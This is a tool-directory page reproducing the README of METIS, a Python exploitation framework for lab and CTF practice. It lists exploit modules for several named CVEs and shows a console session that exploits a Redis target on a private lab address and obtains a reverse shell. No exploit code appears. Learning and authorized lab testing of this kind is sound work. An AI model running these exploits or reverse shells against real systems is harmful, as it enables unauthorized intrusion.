Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
METIS — Modular Python exploitation framework with a Metasploit-style console, auto-registering Exploit and Auxiliary modules, tri-state checks, and multiple session transports for lab and CTF targets. | Kitploit
Tools/GitHubGitHub/k3ystr0k3r/metis
Penetration Testing FrameworksVulnerability ScannersExploit FrameworksExploitationPost-ExploitationCTFPenetration TestingCommand and ControlLearning & EducationRed TeamingRemote Access ToolPayload Development
3618h 1m agoNot yet reviewed
GitHubk3ystr0k3r/metis

METIS

Modular Python exploitation framework with a Metasploit-style console, auto-registering Exploit and Auxiliary modules, tri-state checks, and multiple session transports for lab and CTF targets.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

METIS - Modular Exploitation & Threat Intelligence Framework

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

A Python exploitation framework built for learning. Modular architecture, themed console, multiple session transports, and a growing library of CVE modules.


Community Driven

METIS is a community-driven security research framework. The goal is to build a growing collection of modules contributed by security researchers, developers, and the wider community.

Have a useful scanner, auxiliary module, exploit module, or other security research tooling you'd like to share? Add it to METIS and open a Pull Request.

All contributions are welcome, provided they follow the project's module structure, coding standards, and authorized-use guidelines.

Whether you're adding a new CVE module, improving an existing module, fixing a bug, or building new framework functionality, your contributions can help make METIS better for everyone.

See Writing modules below for information on creating your own module.


What it is

METIS is a modular C2/exploitation framework written in Python. It runs a Metasploit-style interactive console where you select modules, set options, run checks, and land sessions against lab targets.

It's designed for:

  • Learning how exploitation frameworks work under the hood
  • Lab work against vulnerable VMs and containers
  • CTF practice where a scriptable framework is faster than manual tooling
  • Community contributions through custom modules and framework improvements

It is not designed for:

  • Attacking systems you don't own or have written permission to test
  • Production red-team engagements (use Cobalt Strike, Sliver, or Mythic)
  • Anything on the public internet

Features

  • Modular architecture — drop a .py file into modules/ and it auto-registers
  • Two module types — Exploit (spawns sessions) and Auxiliary (scanners, enumerators)
  • Tri-state check() — every module can verify before attacking (VULNERABLE / SAFE / UNKNOWN)
  • Multiple session transports — reverse sockets, bind sockets, paramiko channels, HTTP webshells, raw telnet
  • Threaded scanning — CIDR/comma-list/range/file: target specs with live progress bars
  • Themed console — 22 built-in color schemes with per-theme progress bar gradients
  • RC file automation — script entire workflows
  • Per-module SOURCE files — load options from KEY=VALUE files
  • Local shell escape — run any shell command without leaving the framework
  • Lean core — deliberately minimal dependencies and abstractions

Modules

Auxiliary — scanners and enumerators

ModuleDescription
auxiliary/scanner/tcp_connectThreaded TCP port scanner
auxiliary/scanner/hikvision_cve_2017_7921Hikvision IP camera auth bypass + user enumeration
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847MikroTik WinBox credential leak
auxiliary/scanner/redis_cve_2022_0543Redis Lua sandbox escape detector

Exploits — session-producing

ModuleSession type
exploit/unix/ftp/vsftpd_234_backdoorBind socket
exploit/multi/http/ghost_cms_handlebars_rceReverse socket
exploit/multi/http/langflow_rce_cve_2026_9198Reverse socket
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Reverse socket
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Reverse socket
exploit/multi/http/tomcat_put_rce_cve_2017_12615Reverse socket
exploit/multi/http/joomla_jce_rce_cve_2026_48907HTTP webshell
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Delayed reverse (cron)
exploit/linux/redis/redis_cve_2022_0543_rceReverse socket
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Paramiko channel
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Raw telnet socket

Install

Requires Python 3.10+ and git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Run:

python3 metis.py

Usage

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

Common commands

Download Tool